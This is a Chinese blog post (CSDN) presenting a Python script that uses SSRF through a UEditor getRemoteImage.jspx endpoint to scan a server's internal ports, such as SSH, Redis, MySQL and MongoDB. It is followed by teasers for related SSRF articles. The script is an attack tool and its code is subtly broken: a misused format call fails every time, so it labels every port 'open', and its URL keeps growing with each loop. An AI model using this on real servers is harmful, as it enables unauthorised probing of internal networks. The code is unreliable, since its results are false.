python-SSRF扫描

最新推荐文章于 2024-06-13 16:34:28 发布
最新推荐文章于 2024-06-13 16:34:28 发布
阅读量907 收藏 2
点赞数
分类专栏: python脚本 文章标签: 网络 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/121912725
版权

python-SSRF扫描

SSRF概念:

服务端请求伪造(Server-Side Request Forgery),指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。

import requests


def portsacn(url, rurl):
    ports = [21, 22, 23, 25, 80, 443, 445, 873, 1080, 1099, 1090, 1521, 3306, 6379, 27017]
    for port in ports:
        try:
            url = url + '/ueditor/getRemoteImage.jspx?upfile=' + rurl + ':{port}' + format(port=port)
            response = requests.get(url, timeout=6)
        except:
            print('[+]{port} is open'.format(port=port))


if __name__ == '__main__':
    portsacn('http://www.target.com', 'www.google.com')
xzhome
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
如何在Python开发中拒绝SSRF漏洞
hacckjacking
10-13 429
0x01 SSRF漏洞常见防御及绕过方法 SSRF是一种常见的Web漏洞,于需要请求外部内容的逻辑存在中,比如本地化网络图片、XML解析时的外部实体注入、软件的离线下载等。 URL,提供代码直接请求这个URL,将造成SSRF漏洞 具体表现在以下几个财团上: URL为内网IP或域名,攻击者可以通过SSRF漏洞扫描目标内网,并寻找内网内的漏洞,想办法快速瞄准 URL 中包含端口,攻击者可以扫描并发现内网中的其他服务,再进一步进行利用 当请求方法允许其他协议的时候,将可能使用gophar、file等协议
ssrf漏洞总结
wwwwyyyrre的博客
05-06 199
内网又称,是指在某一区域内由多台计算机以及网络设备构成的网络,比如校园网、政府网等,一般方圆几公里。要进行内网访问 最常用的就是127.0.0.1127.0.0.1是本地的ip地址 也是最常用的访问内网的ip地址拓展 X-Forwarded-For:X-Forwarded-For 是一个 HTTP 扩展头部,主要是为了让 Web 服务器获取访问用户的真实 IP 地址,但是这个IP却未必是真实的 我们可以通过伪造X-Forwarded-For来伪造本地管理员登陆从而达到目的。
python实现程序设计检测一个网址是否存在SSRF漏洞,漏洞检测
最新发布
qw78985431的博客
06-13 96
python实现程序设计检测一个网址是否存在SSRF漏洞,漏洞检测
SSRF漏洞总结
坚持硬核
02-14 1307
0x00 什么是SSRF? 服务端请求伪造(SSRF)是指攻击者能够从易受攻击的web应用程序发送精心设计的请求,对其他网站进行攻击(利用一个可发起网络请求的服务当做跳板来攻击其他服务) 例如:我在http://localhost:8888/pentest/ssrf/index.php有这样一个存在SSRF漏洞的index.php。即我得到了一个使用curl发起网络请求然后返回客户端并且我可以...
网络安全-SSRF漏洞原理、攻击与防御
热门推荐
关注网络安全、云原生安全
09-05 2万+
概述 SSRF(Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统(因为他是从内部系统访问的,所以它能够请求到与它相连而与外网隔离的内部系统。)。 原理 SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,文档等等。SSRF漏洞通过篡改获取资源的请求发送给服务器(服...
基于ca的安全web访问_Web安全:越权访问漏洞
weixin_35750483的博客
01-28 164
文章来源:计算机与网络安全越权访问漏洞分为平行越权访问漏洞与垂直越权访问漏洞两类。平行越权访问漏洞指的是权限平级的两个用户之间的越权访问。比如一个普通的用户A通常只能够对自己的一些信息进行增、删、改、查,但是由于开发者的一时疏忽,在对信息进行增、删、改、查的时候未判断所需要操作的信息是否属于对应的用户。因此,导致用户A可以操作其他人的信息。垂直越权访问漏洞指的是权限不等的两个用户之间的越...
(基于python的毕业设计)漏洞扫描系统(源码+说明+演示视频).zip
06-17
(基于python的毕业设计)漏洞扫描系统(源码+说明+演示视频),本科毕业设计高分项目。 【项目技术】 python+Django+mysql 【实现功能】 本次的漏洞扫描主要是集中在对于端口的漏洞扫描,是通过对目标主机的端口和网络...
See-SURF:基于Python扫描仪以查找潜在的SSRF参数
05-27
见表面基于Python扫描程序,用于在Web应用程序中查找潜在的SSRF参数。 See-SURF通过向您的服务器发出DNS / HTTP请求来帮助您检测潜在的SSRF参数并验证发现该参数的可能性。 可以在进行错误搜索/网络安全测试时将其...
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务端请求伪造,当作跳板攻击内网服务[+] 扫描内部网络、服务[+] 访问本机敏感文件[+] 向特定端口发送数据包、payload.├── ...
BurpParamFlagger:Burp扩展添加了被动扫描检查,以标记其名称或值可能指示SSRF或LFI可能插入点的参数
03-04
BurpParamFlagger Burp扩展添加了被动扫描检查,以标记其名称或值可能指示SSRF或LFI可能插入点的参数。 注意:我相信Burp Pro必须使用此扩展,因为它增加了扫描仪功能,而社区版本不包含此功能。 该扩展名将同时查看...
scant3r:ScanT3r-网络安全扫描
03-16
scant3r将帮助您更快地编写自己的python脚本,无需配置http / threads / errors / options / etc ...,只需在脚本中编写main函数,即可在终端中运行它或访问您的脚本从api:D模组模块描述劳斯尔夫对隐藏参数进行暴力...
web渗透测试----15、SSRF漏洞(服务端请求伪造漏洞)
七天
07-02 6597
SSRF漏洞是一种在未能获取服务器权限时,利用服务器漏洞,由攻击者构造请求,服务器端发起请求的安全漏洞,攻击者可以利用该漏洞诱使服务器端应用程序向攻击者选择的任意域发出HTTP请求。 很多Web应用都提供了从其他的服务器上获取数据的功能,根据用户指定的URL,Web应用可以获取图片、下载文件、读取文件内容等。这种功能如果被恶意使用,将导致存在缺陷的Web应用被作为代理通道去攻击本地或远程服务器。这种形式的攻击被称为服务端请求伪造攻击。 一般情况下,SSRF攻击的目标是外网无法访问的内部系统。 文章目录前
关于http和https允许请求设置header问题
TryCatch
11-25 1万+
在给微信小程序提供接口的时候使用的是https,token是放在header里面, 不过服务器一直没获取到,怀疑可能是nginx没有允许设置header。解决办法就是在nginx配置文件里面加上underscores_in_headers on; ### wechatapi Start upstream wechatapi { server localhost:8009; }
SSRF概念 攻击方式 防范措施
m0_57116761的博客
08-18 684
SSRF (Server-side Request Forge, 服务端请求伪造)。由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务。有的大型网站在web应用上提供了从其他服务器获取数据的功能。使用户指定的URL web应用获取图片,下载文件,读取文件内容。攻击者利用有缺陷的web应用作为代理攻击远程和内网的服务器(跳板) 服务器端请求伪造,是一种由攻击者构造请求,由服务端发起请求的安全漏洞。 一般情况下,SSRF攻击的目标是外网无法访问的内部系统(因为请求是.
SSRF漏洞原理和实验
gl620321的博客
06-02 4153
一.SSRF概述 SSRF(Server-Side Request Forgery:服务器端请求伪造) 其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制 导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据 数据流:攻击者----->服务器---->目标地址 根据后台使用的函数的不同,对应的影响和利用方...
【漏洞学习——SSRF】腾讯某处SSRF漏洞(非常好的利用点)附利用脚本
Fly_鹏程万里
02-22 6514
漏洞细节 ## 1. 描述 本文章将概述一些经典的SSRF漏洞利用原理,从Fuzz扫描开放的服务到漏洞的自动化利用,刚好腾讯的这个漏洞点,非常适合做为案例来演示。### 1.1 漏洞信息 > 腾讯微博应用  > http://share.v.t.qq.com > SSRF利用点,参数: url > http://share.v.t.qq.com/index.php?c=s...
python代码执行漏洞_Python安全 - 从SSRF到命令执行惨案
weixin_39852953的博客
12-17 228
前两天遇到的一个问题,起源是在某个数据包里看到url=这个关键字,当时第一想到会不会有SSRF漏洞。以前乌云上有很多从SSRF打到内网并执行命令的案例,比如有通过SSRF+S2-016漏洞漫游内网的案例,十分经典。不过当时拿到这个目标,我只是想确认一下他是不是SSRF漏洞,没想到后面找到了很多有趣的东西。截图不多(有的是后面补得),大家凑合看吧。目标example.com,根据其中csrf_tok...
【技术分享】Python安全 - 从SSRF到命令执行惨案
Fly_鹏程万里
03-16 623
前两天遇到的一个问题,起源是在某个数据包里看到url=这个关键字,当时第一想到会不会有SSRF漏洞。 以前乌云上有很多从SSRF打到内网并执行命令的案例,比如有通过SSRF+S2-016漏洞漫游内网的案例,十分经典。不过当时拿到这个目标,我只是想确认一下他是不是SSRF漏洞,没想到后面找到了很多有趣的东西。截图不多(有的是后面补得),大家凑合看吧。 0x01 判断SSRF漏洞 目标exam...
设计ssrf端口扫描
06-13
设计一个简单的 SSRF(Server Side Request Forgery)端口扫描器是一个复杂的任务,因为它涉及到网络编程、漏洞利用和安全边界的知识。SSRF是指服务器被恶意请求所利用,发起对其他服务器的请求,这通常发生在应用没有正确限制访问范围的时候。以下是一些基本步骤来创建一个基础的扫描器: 1. **目标选择**:明确你要扫描的目标URL范围或模式,例如特定域名下的所有子域。 2. **协议识别**:确定要扫描的协议,如HTTP、HTTPS、FTP等,因为不同协议的默认端口不同。 3. **请求构建**:使用HTTP客户端库(如Python的requests、Go的http.Client)创建请求,可以包含自定义的User-Agent、Cookie等信息。 4. **端口遍历**:对于每个目标URL,尝试不同的端口号,从常见的服务端口(如80, 443, 21)到不那么常见的端口。 5. **响应处理**:对每个响应进行解析,检查HTTP状态码,如果遇到404或403错误,可能是开放的端口。 6. **异常处理**:捕获可能的网络错误或服务器拒绝连接,避免程序中断。 7. **结果记录**:将扫描结果保存到文件或数据库中,方便后续分析。 8. **安全性考虑**:确保扫描过程尽可能地模拟正常用户行为,避免触发防火墙或安全策略。 9. **法律遵从**:在进行此类操作前,请确保你的行为符合当地的法律法规,尊重目标服务器的所有权。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值